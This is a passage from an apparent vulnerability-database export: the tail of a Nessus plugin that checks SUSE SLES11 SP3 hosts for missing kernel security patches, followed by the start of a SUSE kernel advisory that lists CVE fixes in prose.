value:\"https://bugzilla.suse.com/show_bug.cgi?id=934787\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=935123\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=937444\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=939955\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=940017\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=940413\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=940913\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=940946\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=941514\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=942082\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=946122\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=947128\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=948330\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=949298\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=949752\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=949936\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=950750\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=950998\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=951392\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=952976\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=954628\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=955308\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=955354\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=955654\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=955673\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=956375\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=956514\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=956707\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=956708\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=956709\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=956852\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=956949\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=957988\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=957990\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=958463\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=958886\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=958906\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=958912\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=958951\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=959190\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=959312\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=959399\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=959705\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=960857\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=961500\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=961509\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=961512\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=961516\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=961518\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=963276\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=963765\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=963767\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=963998\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=964201\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=965319\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=965923\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=966437\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=966693\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=967863\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=967972\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=967973\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=967974\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=967975\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=968010\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=968011\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=968012\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=968013\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=968141\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=968670\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=969307\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=970504\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=970892\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=970909\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=970911\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=970948\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=970956\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=970958\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=970970\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=971124\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=971125\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=971360\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=973570\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=974646\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=975945\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2013-7446/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-7509/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-7515/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-7550/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-7566/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-7799/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-8215/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-8539/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-8543/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-8550/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-8551/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-8552/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-8569/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-8575/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-8767/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-8785/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-8812/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-8816/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-0723/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-2069/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-2143/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-2184/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-2185/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-2186/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-2188/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-2384/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-2543/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-2544/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-2545/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-2546/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-2547/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-2548/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-2549/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-2782/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-2847/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-3137/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-3138/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-3139/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-3140/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-3156/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-3955/\"\n );\n # https://www.suse.com/support/update/announcement/2016/suse-su-20161203-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?ef8495a0\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE OpenStack Cloud 5 :\n\nzypper in -t patch sleclo50sp3-kernel-20160414-12537=1\n\nSUSE Manager Proxy 2.1 :\n\nzypper in -t patch slemap21-kernel-20160414-12537=1\n\nSUSE Manager 2.1 :\n\nzypper in -t patch sleman21-kernel-20160414-12537=1\n\nSUSE Linux Enterprise Server 11-SP3-LTSS :\n\nzypper in -t patch slessp3-kernel-20160414-12537=1\n\nSUSE Linux Enterprise Server 11-EXTRA :\n\nzypper in -t patch slexsp3-kernel-20160414-12537=1\n\nSUSE Linux Enterprise Debuginfo 11-SP3 :\n\nzypper in -t patch dbgsp3-kernel-20160414-12537=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-bigsmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-bigsmp-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-bigsmp-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-man\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-ec2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-ec2-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-ec2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-pae-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-pae-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-source\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-syms\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-trace\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-trace-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-trace-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/04/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/05/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/05/04\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES11)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES11\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES11\" && (! preg(pattern:\"^(3)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES11 SP3\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-ec2-3.0.101-0.47.79.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-ec2-base-3.0.101-0.47.79.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-ec2-devel-3.0.101-0.47.79.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-xen-3.0.101-0.47.79.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-xen-base-3.0.101-0.47.79.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-xen-devel-3.0.101-0.47.79.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-bigsmp-3.0.101-0.47.79.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-bigsmp-base-3.0.101-0.47.79.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-bigsmp-devel-3.0.101-0.47.79.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-pae-3.0.101-0.47.79.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-pae-base-3.0.101-0.47.79.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-pae-devel-3.0.101-0.47.79.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"s390x\", reference:\"kernel-default-man-3.0.101-0.47.79.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"kernel-default-3.0.101-0.47.79.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"kernel-default-base-3.0.101-0.47.79.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"kernel-default-devel-3.0.101-0.47.79.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"kernel-source-3.0.101-0.47.79.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"kernel-syms-3.0.101-0.47.79.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"kernel-trace-3.0.101-0.47.79.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"kernel-trace-base-3.0.101-0.47.79.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"kernel-trace-devel-3.0.101-0.47.79.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"i586\", reference:\"kernel-ec2-3.0.101-0.47.79.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"i586\", reference:\"kernel-ec2-base-3.0.101-0.47.79.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"i586\", reference:\"kernel-ec2-devel-3.0.101-0.47.79.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"i586\", reference:\"kernel-xen-3.0.101-0.47.79.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"i586\", reference:\"kernel-xen-base-3.0.101-0.47.79.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"i586\", reference:\"kernel-xen-devel-3.0.101-0.47.79.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"i586\", reference:\"kernel-pae-3.0.101-0.47.79.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"i586\", reference:\"kernel-pae-base-3.0.101-0.47.79.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"i586\", reference:\"kernel-pae-devel-3.0.101-0.47.79.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-09-18T14:41:22", "description": "The SUSE Linux Enterprise 11 SP2 kernel was updated to receive various security and bug fixes. The following security bugs were fixed :\n\n - CVE-2016-4486: Fixed 4 byte information leak in net/core/rtnetlink.c (bsc#978822).\n\n - CVE-2016-3134: The netfilter subsystem in the Linux kernel did not validate certain offset fields, which allowed local users to gain privileges or cause a denial of service (heap memory corruption) via an IPT_SO_SET_REPLACE setsockopt call (bnc#971126).\n\n - CVE-2016-2847: fs/pipe.c in the Linux kernel did not limit the amount of unread data in pipes, which allowed local users to cause a denial of service (memory consumption) by creating many pipes with non-default sizes (bnc#970948).\n\n - CVE-2016-2188: The iowarrior_probe function in drivers/usb/misc/iowarrior.c in the Linux kernel allowed physically proximate attackers to cause a denial of service (NULL pointer dereference and system crash) via a crafted endpoints value in a USB device descriptor (bnc#970956).\n\n - CVE-2016-3138: The acm_probe function in drivers/usb/class/cdc-acm.c in the Linux kernel allowed physically proximate attackers to cause a denial of service (NULL pointer dereference and system crash) via a USB device without both a control and a data endpoint descriptor (bnc#970911).\n\n - CVE-2016-3137: drivers/usb/serial/cypress_m8.c in the Linux kernel allowed physically proximate attackers to cause a denial of service (NULL pointer dereference and system crash) via a USB device without both an interrupt-in and an interrupt-out endpoint descriptor, related to the cypress_generic_port_probe and cypress_open functions (bnc#970970).\n\n - CVE-2016-3140: The digi_port_init function in drivers/usb/serial/digi_acceleport.c in the Linux kernel allowed physically proximate attackers to cause a denial of service (NULL pointer dereference and system crash) via a crafted endpoints value in a USB device descriptor (bnc#970892).\n\n - CVE-2016-2186: The powermate_probe function in drivers/input/misc/powermate.c in the Linux kernel allowed physically proximate attackers to cause a denial of service (NULL pointer dereference and system crash) via a crafted endpoints value in a USB device descriptor (bnc#970958).\n\n - CVE-2016-2185: The ati_remote2_probe function in drivers/input/misc/ati_remote2.c in the Linux kernel allowed physically proximate attackers to cause a denial of service (NULL pointer dereference and system crash) via a crafted endpoints value in a USB device descriptor (bnc#971124).\n\n - CVE-2016-3156: The IPv4 implementation in the Linux kernel mishandles destruction of device objects, which allowed guest OS users to cause a denial of service (host OS networking outage) by arranging for a large number of IP addresses (bnc#971360).\n\n - CVE-2016-2184: The create_fixed_stream_quirk function in sound/usb/quirks.c in the snd-usb-audio driver in the Linux kernel allowed physically proximate attackers to cause a denial of service (NULL pointer dereference or double free, and system crash) via a crafted endpoints value in a USB device descriptor (bnc#971125).\n\n - CVE-2016-3139: The wacom_probe function in drivers/input/tablet/wacom_sys.c in the Linux kernel allowed physically proximate attackers to cause a denial of service (NULL pointer dereference and system crash) via a crafted endpoints value in a USB device descriptor (bnc#970909).\n\n - CVE-2016-2143: The fork implementation in the Linux kernel on s390 platforms mishandled the case of four page-table levels, which allowed local users to cause a denial of service (system crash) or possibly have unspecified other impact via a crafted application, related to arch/s390/include/asm/mmu_context.h and arch/s390/include/asm/pgalloc.h (bnc#970504).\n\n - CVE-2016-2782: The treo_attach function in drivers/usb/serial/visor.c in the Linux kernel allowed physically proximate attackers to cause a denial of service (NULL pointer dereference and system crash) or possibly have unspecified other impact by inserting a USB device that lacks a (1) bulk-in or (2) interrupt-in endpoint (bnc#968670).\n\n - CVE-2015-8816: The hub_activate function in drivers/usb/core/hub.c in the Linux kernel did not properly maintain a hub-interface data structure, which allowed physically proximate attackers to cause a denial of service (invalid memory access and system crash) or possibly have unspecified other impact by unplugging a USB hub device (bnc#968010).\n\n - CVE-2015-7566: The clie_5_attach function in drivers/usb/serial/visor.c in the Linux kernel allowed physically proximate attackers to cause a denial of service (NULL pointer dereference and system crash) or possibly have unspecified other impact by inserting a USB device that lacks a bulk-out endpoint (bnc#961512).\n\n - CVE-2016-2549: sound/core/hrtimer.c in the Linux kernel did not prevent recursive callback access, which allowed local users to cause a denial of service (deadlock) via a crafted ioctl call (bnc#968013).\n\n - CVE-2016-2547: sound/core/timer.c in the Linux kernel employed a locking approach that did not consider slave timer instances, which allowed local users to cause a denial of service (race condition, use-after-free, and system crash) via a crafted ioctl call (bnc#968011).\n\n - CVE-2016-2548: sound/core/timer.c in the Linux kernel retained certain linked lists after a close or stop action, which allowed local users to cause a denial of service (system crash) via a crafted ioctl call, related to the (1) snd_timer_close and (2) _snd_timer_stop functions (bnc#968012).\n\n - CVE-2016-2546: sound/core/timer.c in the Linux kernel used an incorrect type of mutex, which allowed local users to cause a denial of service (race condition, 